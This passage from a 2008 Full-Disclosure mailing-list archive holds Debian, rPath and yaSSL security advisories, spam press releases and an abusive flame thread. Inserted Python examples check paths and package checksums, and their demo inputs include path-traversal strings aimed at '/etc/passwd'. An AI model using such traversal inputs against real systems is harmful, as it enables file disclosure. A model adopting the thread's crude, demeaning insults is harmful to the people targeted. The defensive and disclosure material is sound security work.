    Size/MD5 checksum: 22742 f8f77dc0c4f8a3bc67bf2214bcc46be9
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 22408 e4e0350f57fd06adb2e2fbc89af42dd6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 7406210 3919cfdcc8da4478c10f41b5401cbdf6
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 575888 21e0043941b17edbaa3cdc1e7111e057
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 182532 399a017ea351749cd273e14e4bb90b4d
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_mipsel.deb
    Size/MD5 checksum: 22402 4703a3efb299bd24f2efbddc903e75b4

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 583540 d28ec863702730a3a0c751348713fb08
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 22402 bbd1291dc8ec5c51bec315cfd76dabe6
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 22394 f0483cfdb2a6bd95e8279020e667a00b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 182528 76431e0cd12897406aad8d7c7d228b1d
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 8605240 881a95185ccfd14962c4454e63a1e061
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 22408 8eef1dd12f730770000167906dc13ba8
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 22742 5ba721ddf0c19fe68c1e7e9b2a42d617
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_powerpc.deb
    Size/MD5 checksum: 104146 904f61784d5497b0e9c62c5f6212716b

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 640934 a4c0a38b84f1743132fe97104e60e0f8
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 115516 7e36d728f20872a20c97888ff71f2f8a
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 22746 1d8ff68d170493a9f933efe99dc5de4b
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 9756462 ef44439e24ad9fce4eb83def19baf2fd
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 182512 efe82f566fd8cb93813aebb12b661915
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 22396 19cb8ffa456f85d4df01a9aa4afcb790
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 22404 dae9cb6e19ed7f64ce9c91b0ea428950
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_s390.deb
    Size/MD5 checksum: 22410 b8645896b1016a68bbd60f0074a5b8b2

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-dev_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 22410 c7f2f6fd47e7d99a23c416be856bf7e3
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal-common_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 22744 f4956c04dfaaf715f6d541f10c032603
  http://security.debian.org/pool/updates/main/w/wireshark/tshark_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 103478 506c9304b2ad26c5d4b0d87b5250a4d8
  http://security.debian.org/pool/updates/main/w/wireshark/ethereal_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 22396 dd3f26bc33cf50407c0a48d380210285
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 8686584 4c989456f94e655e02eb60f89319efa2
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 586394 ffa4683f4363e6b712cf4033bddb57fb
  http://security.debian.org/pool/updates/main/w/wireshark/tethereal_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 22408 47b020875b4cbb7ca969acb5bd7e4476
  http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_0.99.4-5.etch.2_sparc.deb
    Size/MD5 checksum: 182538 d9b164dc5a1cc864cd237fdb29bf46d3

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfVQTXm3vHE4uyloRAkgHAJ4o8GikpPmWCrwPBC/XFc0zlRMDjgCg2pqm
mMVpOLVQzV/Z16OFLq4ehUI=
=fHZ0
-----END PGP SIGNATURE-----

From jmm at debian.org Thu Jan 3 21:54:49 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 22:54:49 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1447-1] New tomcat5.5 packages fix several vulnerabilities
Message-ID: <20080103215449.GA12756@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1447-1                  security at debian.org
http://www.debian.org/security/                         Moritz Muehlenhoff
January 03, 2008                       http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : tomcat5.5
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3382 CVE-2007-3385 CVE-2007-3386 CVE-2007-5342 CVE-2007-5461

Several remote vulnerabilities have been discovered in the Tomcat servlet and JSP engine. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-3382

    It was discovered that single quotes (') in cookies were treated as a delimiter, which could lead to an information leak.

CVE-2007-3385

    It was discovered that the character sequence \" in cookies was handled incorrectly, which could lead to an information leak.

CVE-2007-3386

    It was discovered that the host manager servlet performed insufficient input validation, which could lead to cross-site scripting.

CVE-2007-5342

    It was discovered that the JULI logging component did not restrict its target path, resulting in potential denial of service through file overwrites.

CVE-2007-5461

    It was discovered that the WebDAV servlet is vulnerable to absolute path traversal.

For the stable distribution (etch), these problems have been fixed in version 5.5.20-2etch1.

The old stable distribution (sarge) doesn't contain tomcat5.5.

The unstable distribution (sid) will be fixed soon.

We recommend that you upgrade your tomcat5.5 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
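The two path-handling entries above (the JULI logger not restricting its target path, CVE-2007-5342, and absolute path traversal in the WebDAV servlet, CVE-2007-5461) share one root cause: a path taken from a request or a configuration is used without confirming that it resolves inside the directory it was meant for. The Python helper below is an added example, not Tomcat's or Debian's code, showing the confinement check a servlet or a log writer should make before opening a file. The policy it enforces (reject absolute input, reject NUL bytes, treat backslashes as separators, reject anything that normalises outside the base) is an assumption made for the example and does not describe the actual Tomcat fix; the base directories in the demo are likewise made up.

```python
"""Confine a user- or config-supplied path to a base directory.

Added example (not from the advisory or from Tomcat). The same check
serves both a WebDAV-style document root and a log directory: the
caller passes the directory the path is *supposed* to stay in, and
gets back either a safe absolute path or None.
"""
import os
import posixpath


def confine(base_dir: str, user_path: str):
    """Return the absolute path of user_path inside base_dir, or None if it escapes.

    Assumed policy for this example:
      - absolute input is rejected outright rather than silently re-rooted;
      - embedded NUL bytes are rejected (they truncate C-level path strings);
      - backslashes count as separators so 'a\\..\\b' cannot slip past a
        POSIX-only check on a platform that honours both;
      - after lexical normalisation the result must still lie under base_dir.
    The check is lexical: if base_dir itself may contain symlinks that point
    outside, call os.path.realpath() on the result and repeat the prefix test.
    """
    if not user_path or "\x00" in user_path:
        return None
    candidate = user_path.replace("\\", "/")
    if posixpath.isabs(candidate):
        return None
    normalised = posixpath.normpath(candidate)
    if normalised == ".." or normalised.startswith("../"):
        return None
    base = os.path.abspath(base_dir)
    full = os.path.abspath(os.path.join(base, normalised))
    # Compare as directory components, not as a string prefix, so that a
    # base of /srv/webdav does not accept /srv/webdav2/anything.
    if os.path.commonpath([base, full]) != base:
        return None
    return full


def triage(base_dir: str, requests):
    """Map each constructed request path to its confined result (None = rejected)."""
    return {p: confine(base_dir, p) for p in requests}


if __name__ == "__main__":
    # Constructed sample inputs; the base directories are made up for the demo.
    for base, paths in (
        ("/srv/webdav", ["docs/report.txt", "/etc/passwd", "../../etc/passwd",
                         "docs/../notes.txt", "a\\..\\..\\b"]),
        ("/var/log/tomcat", ["catalina.2008-01-03.log", "../../../tmp/overwrite.me"]),
    ):
        for p, result in triage(base, paths).items():
            print(f"{base!s:18} {p!r:28} -> {result}")
```

The function returns the resolved path rather than a boolean so the caller opens exactly the path that was checked, which avoids a second, unchecked join later in the code.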
Source archives:

  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20.orig.tar.gz
    Size/MD5 checksum: 4796377 5775bae8fac16a0e3a2c913c4768bb37
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1.dsc
    Size/MD5 checksum: 1277 c2193e917dd759a50b8481177bfcef39
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1.diff.gz
    Size/MD5 checksum: 28422 6df1691cbea55b10e2d2d865b4b2983a

Architecture independent packages:

  http://security.debian.org/pool/updates/main/t/tomcat5.5/libtomcat5.5-java_5.5.20-2etch1_all.deb
    Size/MD5 checksum: 2385530 5f6482d73f7507b5f2f050ea825ee800
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5-webapps_5.5.20-2etch1_all.deb
    Size/MD5 checksum: 1472296 4bc554684655794b1d82db2160d67bea
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1_all.deb
    Size/MD5 checksum: 56744 a1de64bb115d03c4d33c28065e0c793a
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5-admin_5.5.20-2etch1_all.deb
    Size/MD5 checksum: 1162332 ab90aab000037913260361eec812c573

These files will probably be moved into the stable distribution on its next update.
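The upgrade instructions above say "wget url" then "dpkg -i file.deb", and the file list pairs every URL with a size and an MD5 checksum. The step a practitioner wants in between is the comparison of the downloaded file against that list. The script below is an added Python example, not part of the DSA or of Debian's tooling: it parses "URL ... Size/MD5 checksum: SIZE HASH" pairs (whether laid out on separate lines, as in the advisory, or collapsed onto one line, as in this archive page) and checks a file's size and digest before installation. The SAMPLE_ADVISORY text is a constructed excerpt copying two entries of this advisory. MD5 is compared because that is what the 2008 advisory publishes; it is the PGP signature on the advisory that authenticates the list, and that is a separate gpg check not performed here.

```python
"""Verify a downloaded Debian package against an advisory's Size/MD5 list.

Added example, not Debian's code. The parser accepts the advisory's own
layout (URL on one line, 'Size/MD5 checksum:' on the next) and the
whitespace-collapsed layout seen in list archives, since '\\s+' in the
pattern spans newlines as well as spaces.
"""
import hashlib
import hmac
import re

# Constructed excerpt in the advisory's format; the two entries are copied
# from the DSA-1447-1 file list above.
SAMPLE_ADVISORY = """\
Source archives:

  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1.dsc
    Size/MD5 checksum:     1277 c2193e917dd759a50b8481177bfcef39
  http://security.debian.org/pool/updates/main/t/tomcat5.5/tomcat5.5_5.5.20-2etch1.diff.gz
    Size/MD5 checksum:    28422 6df1691cbea55b10e2d2d865b4b2983a
"""

_ENTRY = re.compile(
    r"(https?://\S+)\s+Size/MD5 checksum:\s+(\d+)\s+([0-9a-fA-F]{32})"
)


def parse_advisory(text: str):
    """Return {url: (size_in_bytes, md5_hex_lowercase)} for every listed file."""
    return {
        url: (int(size), digest.lower())
        for url, size, digest in _ENTRY.findall(text)
    }


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def verify_blob(data: bytes, expected_size: int, expected_md5: str) -> bool:
    """True only if both size and digest match.

    Size is checked first as a cheap filter; the digest comparison uses
    hmac.compare_digest so a mismatch is not reported faster than a match.
    """
    if len(data) != expected_size:
        return False
    return hmac.compare_digest(md5_hex(data), expected_md5.lower())


def verify_file(path: str, url: str, entries) -> bool:
    """Verify the file at `path` against the advisory entry for `url`.

    A URL absent from the list is an error, not a pass: a file the
    advisory never mentioned must not be installed on its strength.
    """
    if url not in entries:
        raise KeyError(f"{url} is not listed in the advisory")
    size, digest = entries[url]
    with open(path, "rb") as fh:
        return verify_blob(fh.read(), size, digest)


if __name__ == "__main__":
    entries = parse_advisory(SAMPLE_ADVISORY)
    for url, (size, digest) in entries.items():
        print(f"{url.rsplit('/', 1)[1]:40} {size:>8} {digest}")
    # Constructed bytes standing in for a downloaded file (not a real .deb).
    blob = b"constructed package bytes"
    print("intact  :", verify_blob(blob, len(blob), md5_hex(blob)))
    print("tampered:", verify_blob(blob + b"!", len(blob) + 1, md5_hex(blob)))
```

In use, run it over the advisory text you received and pass each downloaded file with the URL it came from to verify_file(); a False result or a KeyError means the file should not reach dpkg -i.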
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfVlLXm3vHE4uyloRAu9YAKCr8kSTbngRMSr2psqJc8bj0dtacgCg4EKV
qrMdQPckD+pDH9gSb7REw6o=
=fatv
-----END PGP SIGNATURE-----

From reepex at gmail.com Fri Jan 4 01:02:38 2008
From: reepex at gmail.com (reepex)
Date: Thu, 3 Jan 2008 19:02:38 -0600
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
In-Reply-To: <477C5CA3.7020508@bellsouth.net>
References: <20080102164630.F3980118039@mailserver5.hushmail.com> <477C5CA3.7020508@bellsouth.net>
Message-ID:

well I will miss all your fan mail from the past. maybe i will forward them to the list one day for other's entertainment

On Jan 2, 2008 9:55 PM, scott wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> And your earth-shattering views are *SO* important, you must make sure everyone hears you. I think you just like to see your own posts.
>
> I'm filtering your posts from now on as they are nothing but from a wanna-be trying to play kids' games in a man's world.
>
> I shouldn't waste my time responding to a teeny-bopper, anyway.
>
> Scott
>
> reepex wrote:
> > So you included me in here because my name has something to do with farm equipment? Did your message have a point?
> >
> > You wrote a bunch of nonsense flattering your favorite security stars and then attempted to flame us with one liners that did not make sense.. It seems you are caught in between the serious posters (since you have no skill, you cannot post anything useful), and the trolls (because you are not funny or convincing).
> >
> > My version of full disclosure is calling out idiots with CISSPs and PhDs who post here and think their XSS and earth shattering barrages of 0x41's makes them security experts.
> >
> > On Jan 2, 2008 10:46 AM, <31415926 at hush.ai> wrote:
> >
> >> Critical Vulnerability in [Full-Disclosure]
> >>
> >> The problem with full disclosure is that everyone feels the need to fully disclose, even when their opinion and the information they are purporting to impart is, well, bollocks. You can't tell them to shut up as they think they're important and the internet gives them balls of steel and verbal diarrhoea, so we stumble from one tired flamewar to another with no useful content being published.
> >>
> >> It's embarrassing.
> >>
> >> I'm an advocate of FD as a concept. I believe that there is no such thing as an innocent on the internet and if you really are that dumb, then you deserve everything you get. FD (as one of many like-minded lists) forces the vendors to patch or die and eventually write quality code. FD (the concept, not the list) is the ultimate nuclear deterrent, without the mutually assured destruction lunacy.
> >>
> >> I have watched the posters to this list for some time. By far the vast majority are transparently kiddies, sitting on their painted-up laptops thinking of themselves as the techno-brats in the film "Hackers" and hoping to grow up to be like the guy in the film "Swordfish". They write in l33t5p34k and think that this somehow makes them informed. Kiddies are the lowest form of life in the hierarchy of information security and in the IT industry generally.
> >>
> >> You know who you are and so does everyone else. You are fools, and an embarrassment to the craft:
> >> Secreview (review of products/services you have never bought, are you the goatse.cz receiver?)
> >> Reepex (Isn't a reepex a bit of farm machinery?)
> >> Gobbles (A nickname for a gay male prostitute)
> >> Morning Wood (The holy grail of the viagra-abuser)
> >> Gmaggro ("high value target selection", are you completely cocking stupid?)
> >>
> >> Oh, the outrage.
> >>
> >> I can see it now. There will be armies of skiddies demanding that the l33tz hack this f at cker, spam him, pwn him, and post defamatory messages concerning her skills and possible employment opportunities for her and her mother everywhere possible. Guess what, kids? I don't care.
> >>
> >> No, not even a little bit. Do what you like, I could care less and no one else cares if you live or die tonight, you sad, acne'd little dewdrops.
> >>
> >> Calmed down yet?
> >>
> >> Good. I want you to consider something.
> >>
> >> The FD list consists of the following content (and what it has to say):
> >>
> >> Advisories by vendors (we fixed this)
> >> Advisories by individuals (I tested that and found this)
> >> Advisories by infosec organisations (we found this)
> >> Funnies (self explanatory)
> >> Opinions (this sucks, what about that?)
> >> Skids (I did this, aren't I great, everyone else sucks?)
> >> Trolls (you suck)
> >> Trawlers (I have something 0day to buy or sell)
> >>
> >> The top three (ie the useful content) is available in any one of a hundred places, the bottom three are noise. The only people interested in the noise are those who keep track of it for a living.
> >>
> >> So, consider that by posting anything in the bottom three categories, you are drawing the attention of those who take an interest in your sad efforts to destabilise the technical crutch of society. These people are better than you in every important way, and if you so much as tiptoe across one of their lines, you'll wind up sharing a cell with a 7ft gorilla called george with a dead mouse and a pressing need to dry-cornhole your ringpiece 3 times a night and twice on sundays.
> >> Do yourselves a favour and STFU.
> >>
> >> What's left?
> >>
> >> The funnies and the opinions. I've laughed my tits off at posts by Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've been interested by a few others who will remain nameless as I can't list them all. Long live full disclosure, but keep in mind that you're only legends in your own bedrooms.
> >>
> >> later, pi
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
> > ----------------------------------------------------------------------
> >
>
> - --
> redhowlingwolves
> Web:
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iD8DBQFHfFyhxajqy/aNaRsRAnrxAJ9HdTwy+i8X6+L/9Ol5UkqmKpl1kwCeI9N2
> XqT/0tOM1wkEmvVrYlL+yCE=
> =fasY
> -----END PGP SIGNATURE-----
>

From auto113496 at hushmail.com Fri Jan 4 06:28:30 2008
From: auto113496 at hushmail.com (auto113496 at hushmail.com)
Date: Fri, 04 Jan 2008 01:28:30 -0500
Subject: [Full-disclosure] http://www.plannetgroup.com/home.html
Message-ID: <20080104062830.9351520038@mailserver7.hushmail.com>

Check this out...

http://www.plannetgroup.com/home.html

From announce-noreply at rpath.com Thu Jan 3 18:33:39 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 03 Jan 2008 13:33:39 -0500
Subject: [Full-disclosure] rPSA-2008-0001-1 dovecot
Message-ID: <477d2a83.r5Kp7P7DBrgd7xA8%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0001-1
Published: 2008-01-03
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Remote User Non-deterministic Weakness
Updated Versions:
    dovecot=conary.rpath.com at rpl:1/1.0.10-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2076

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6598

Description:
    Previous versions of the dovecot package contain multiple vulnerabilities, the most serious of which might confuse LDAP-authenticated logins between different users with the same password.
    Other vulnerabilities include Denials of Service which appear to be
    limited to the connecting user.

http://wiki.rpath.com/Advisories:rPSA-2008-0001

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From announce-noreply at rpath.com Thu Jan 3 22:55:57 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 03 Jan 2008 17:55:57 -0500
Subject: [Full-disclosure] rPSA-2008-0004-1 tshark wireshark
Message-ID: <477d67fd.zYMwl8Rf5v9SNdJM%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0004-1
Published: 2008-01-03
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Indirect User Deterministic Denial of Service
Updated Versions:
    tshark=conary.rpath.com at rpl:1/0.99.7-0.1-1
    wireshark=conary.rpath.com at rpl:1/0.99.7-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1975

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6440
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6442
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6443
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6444
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6445
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6446
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6447
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6448
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6449
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451

Description:
    Previous versions of the wireshark package are vulnerable to
    multiple types of Denial of Service attacks, including crashes and
    excessive memory consumption. It has not been determined that these
    vulnerabilities can be exploited to execute malicious code.

http://wiki.rpath.com/Advisories:rPSA-2008-0004

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From candyshop999 at gmail.com Fri Jan 4 10:24:41 2008
From: candyshop999 at gmail.com (Super Star)
Date: Fri, 4 Jan 2008 12:24:41 +0200
Subject: [Full-disclosure] United Built Homes, Pro Step Marketing Partners with Top-Selling Atlantic Beach, NC Real Estate Team
Message-ID:

United Built Homes, Pro Step Marketing Partners with Top-Selling Atlantic Beach, NC Real Estate Team

Huntersville, NC (PRWeb) February 19, 2007 -- Pro Step Marketing, a real estate-focused marketing strategy, design and implementation firm, partnered with The Star Team of Atlantic Beach, NC -- to implement a website and print marketing strategy.

Pro Step Marketing developed a marketing strategy for The Star Team that includes website development, Search Engine Optimization, stationery and a logo. This strategy successfully integrates the team's existing brand that accurately reflects the real estate team and its dedication to its clients.
A large part of the marketing strategy Pro Step Marketing created includes an Atlantic Beach Real Estate website that successfully integrates market-specific content, multiple search options for homebuyers, and useful resources for buyers and sellers.

The Star Team of Smith & Weil Premier Properties provides years of knowledge and experience in the coastal region of North Carolina and will work hard to find you the right property in the Atlantic Beach, N.C. area. The Star Team assists homebuyers and sellers in the Beaufort, Harkers Island and Morehead City real estate markets.

Pro Step Marketing, located in Huntersville, North Carolina, provides Real Estate Web Design marketing consultation and education services to real estate agents across the country, along with logo design, branding services for print and web, website design and development, including lead integration strategies and search engine optimization. Pro Step Marketing has a team dedicated to putting all the pieces together so their clients can finally get the results they've always wanted from their real estate marketing strategies.

From candyshop999 at gmail.com Fri Jan 4 10:19:05 2008
From: candyshop999 at gmail.com (Super Star)
Date: Fri, 4 Jan 2008 12:19:05 +0200
Subject: [Full-disclosure] Martin Pelmore, Finish out the Year with a Rejuvenating Getaway to Fort Lauderdale; Harbor Beach Marriott Resort & Spa Offers Holiday Resort Credit
Message-ID:

Martin Pelmore, Finish out the Year with a Rejuvenating Getaway to Fort Lauderdale; Harbor Beach Marriott Resort & Spa Offers Holiday Resort Credit

Fort Lauderdale, FL (PRWEB) September 16, 2007 -- Celebrate the holidays seaside in Fort Lauderdale with Harbor Beach Marriott Resort and Spa's Holiday Resort Credit Package.
Steal away and take advantage of rates from $249-$319. Available November 16 through December 26, the package includes a deluxe guest room and a $150 Resort Credit for a three-night stay or $300 Resort Credit for a five-night stay. Create a customized inclusive stay when booking the south Florida vacation package. Curl up in a shaded beach cabinette and watch the surf on our quarter-mile stretch of private beach, spend a day in the spa restoring your spirits or shop at four of the resort's unique boutiques, or indulge in a variety of restaurant fare.

Guests can also take advantage of the underwater world: with a fully equipped dive shop and certified dive instructor on the property, the resort boasts two reefs and four dive sites. In a city recognized as one of the world's top diving locales, the beaches here are ideal for observing flat reef crustaceans, offshore marine life and sea turtles, and simply perusing around for seashells.

For more information on the Resort Credit Package, visit

About the Harbor Beach Marriott Resort & Spa

Harbor Beach Marriott Resort & Spa is a premier Fort Lauderdale beach hotel featuring 637 guest rooms, including 35 luxurious suites, all of which include two-lined telephones with message service, data ports, high-speed Internet access, a 32" cable TV with PlayStation capability, deluxe bedding, in-room safe, individual climate control, mini-bar and more. The Spa at Harbor Beach is listed in "100 Best Spas of the World," and is an $8 million seaside oasis boasting 18 private treatment rooms, a private spa pool, sauna, whirlpool, eucalyptus steam rooms, private lockers, health-oriented Spa Café, fitness center, yoga and Pilates classes and motion studio overlooking the ocean. Harbor Beach guests enjoy playing privileges at a selection of Fort Lauderdale private golf courses.
A variety of dining options await you, including 3030 Ocean, one of the best fine dining waterfront restaurants in Fort Lauderdale offering modern American seafood under the helm of famed executive chef Dean James Max. The resort also offers 30,000 sq. ft. of flexible indoor meeting space, 22,500 sq. ft. of outdoor oceanfront terraces and 200,000 sq. ft. of sparkling beach for signature events.

For more information, call (954) 766-6133 or visit

From aluigi at autistici.org Fri Jan 4 17:53:32 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 4 Jan 2008 18:53:32 +0100
Subject: [Full-disclosure] Multiple vulnerabilities in yaSSL 1.7.5
Message-ID: <20080104185332.e8d46100.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  yaSSL
              http://www.yassl.com
Versions:     <= 1.7.5
Platforms:    Windows and *nix
Bugs:         A] buffer-overflow in ProcessOldClientHello
              B] buffer-overflow in "input_buffer& operator>>"
              C] invalid memory access in HASHwithTransform::Update
Exploitation: remote
Date:         04 Jan 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

yaSSL is an open source SSL library mainly used in MySQL and in other
projects.
On MySQL, if SSL support is enabled, it is possible to use this
vulnerability for pre-authentication code execution.

#######################################################################

=======
2) Bugs
=======

-------------------------------------------
A] buffer-overflow in ProcessOldClientHello
-------------------------------------------

The buffer which contains the data received by the client in the Hello
packet has the following structure (from yassl_imp.hpp):

  class ClientHello : public HandShakeBase {
      ProtocolVersion     client_version_;
      Random              random_;
      uint8               id_len_;                      // session id length
      opaque              session_id_[ID_LEN];
      uint16              suite_len_;                   // cipher suite length
      opaque              cipher_suites_[MAX_SUITE_SZ];
      uint8               comp_len_;                    // compression length
      CompressionMethod   compression_methods_;
      ...

where ID_LEN is 32 elements long, MAX_SUITE_SZ 64 and RAN_LEN (Random)
is 32.

The ProcessOldClientHello function called when an old version of the
Hello packet is received doesn't have the needed checks for limiting
the amount of data which will fill these 3 fields leading to a
buffer-overflow vulnerability exploitable for executing code remotely.

From handshake.cpp:

  void ProcessOldClientHello(input_buffer& input, SSL& ssl)
  ...
      ClientHello ch;
  ...
      for (uint16 i = 0; i < ch.suite_len_; i += 3) {
